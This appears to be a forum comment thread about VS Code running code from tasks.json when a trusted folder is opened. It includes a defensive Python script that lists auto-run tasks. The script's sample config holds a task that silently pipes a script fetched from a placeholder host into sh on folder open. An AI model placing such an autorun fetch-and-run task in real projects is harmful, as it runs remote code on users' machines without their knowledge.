Comment by dfajgljsldkjag
10 hours ago
It is scary that a text editor can run hidden code just by opening a folder. We traded our safety for convenience and now we are paying the price. Users will always click the button to trust a file if they think it helps them work faster. We cannot blame them when the software design makes it so easy to make a mistake.
Tooooo be fair
Vim has also had its share of execution vulnerabilities over the years.
https://github.com/numirias/security/blob/master/doc/2019-06...
Yep, it's a shame that we keep making the same mistakes when it comes to basic security practices.
Doesn't it ask you if you trust a folder when you open it?
I always wondered why. Now I finally know that it auto runs code in that folder.
Who thought this is a good idea and why wasn't it specified in ALL CAPS in that dialog?
Is it even documented anywhere?
Very infrequent vscode user here, beginning to think it's some kind of Eclipse.
You are right that the computer asks you. But people click yes because they are used to ignoring warning signs. The software relies on people making perfect choices every time and that never happens.
It should tell me what I should look at before I trust it. Not trusting the workspace means I might as well use Notepad to open it. I wouldn't think that tasks.json includes autorun tasks in addition to build actions.
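For anyone who, like the commenter above, wants to see what "autorun tasks" in tasks.json actually look like and check a folder for them before clicking "Trust": the script below is an added example written for this thread, not VS Code's own code. It parses `.vscode/tasks.json` (which VS Code treats as JSONC, so comments are allowed) and lists every task whose `runOptions.runOn` is `"folderOpen"`, together with the command it would execute and whether the task hides its terminal (`presentation.reveal` of `"silent"` or `"never"`). The keys used are the documented tasks.json schema keys; the sample file embedded in the script is constructed for illustration and does not come from any real repository.

```python
"""List tasks VS Code would start automatically when a folder is opened and
trusted (runOptions.runOn == "folderOpen"), without opening the folder in
VS Code.  Added example for this discussion, not VS Code's own code.
Limitation: trailing commas, which VS Code's JSONC parser also tolerates,
are not handled here."""
import json
from pathlib import Path

# Constructed sample (not a real repository's file): one ordinary build task
# and one task that runs a remote script on folder open with a hidden terminal.
SAMPLE_TASKS_JSON = r'''
{
  // tasks.json is JSONC, so comments like this one are legal
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "make",
      "group": "build"
    },
    {
      "label": "setup dev env",
      "type": "shell",
      "command": "curl -s https://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "silent" }
    }
  ]
}
'''


def strip_jsonc_comments(text: str) -> str:
    """Remove // and /* */ comments that sit outside string literals."""
    out = []
    i, n = 0, len(text)
    in_string = False
    while i < n:
        ch = text[i]
        if in_string:
            out.append(ch)
            if ch == "\\" and i + 1 < n:      # copy escaped character verbatim
                out.append(text[i + 1])
                i += 1
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
            out.append(ch)
        elif text.startswith("//", i):         # line comment: drop up to newline
            while i < n and text[i] != "\n":
                i += 1
            continue
        elif text.startswith("/*", i):         # block comment: drop up to */
            end = text.find("*/", i + 2)
            i = n if end == -1 else end + 2
            continue
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def find_auto_run_tasks(text: str) -> list:
    """Return the tasks that run on folder open, with what they would execute."""
    doc = json.loads(strip_jsonc_comments(text))
    findings = []
    for task in doc.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        # The schema allows per-OS overrides of the command under these keys.
        commands = {"default": task.get("command")}
        for plat in ("windows", "linux", "osx"):
            override = task.get(plat)
            if isinstance(override, dict) and "command" in override:
                commands[plat] = override["command"]
        reveal = task.get("presentation", {}).get("reveal", "always")
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "type": task.get("type", "shell"),
            "commands": commands,
            "args": task.get("args", []),
            "hidden": reveal in ("silent", "never"),  # terminal not shown to the user
        })
    return findings


def scan_folder(folder) -> list:
    """Inspect <folder>/.vscode/tasks.json if it exists; empty list otherwise."""
    path = Path(folder) / ".vscode" / "tasks.json"
    if not path.is_file():
        return []
    return find_auto_run_tasks(path.read_text(encoding="utf-8"))


if __name__ == "__main__":
    import sys
    found = scan_folder(sys.argv[1]) if len(sys.argv) > 1 else find_auto_run_tasks(SAMPLE_TASKS_JSON)
    for t in found:
        flag = " (terminal hidden)" if t["hidden"] else ""
        print(f"folderOpen task {t['label']!r}{flag}: {t['commands']} args={t['args']}")
```

Run it as `python scan_tasks.py /path/to/cloned/repo` before opening the folder in VS Code. Such tasks do not run while the workspace is in Restricted Mode, which is what the trust dialog is gating; the `task.allowAutomaticTasks` setting can also be set to `"off"` so that even trusted workspaces do not start them without asking.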
Who remembers autorun.exe
Yeah, but it's one of those useless permission requests along the lines of "Do you want this program to work or not?"
They're pawning off responsibility without giving people a real choice.
It's like the old permission dialog for Android that was pretty much "do you want to use this app?". Obviously most people just say yes.
There's a reason Google changed that.
To be fair, I'm sure Microsoft would switch to a saner permission model if they could, but it's kind of too late.
It's not a false choice - "Trust" and "don't trust" are both perfectly viable options. The editor works fine in restricted mode, you just won't have all your extensions enabled.
> We traded our safety for convenience
Not the first time. Same with LLMs.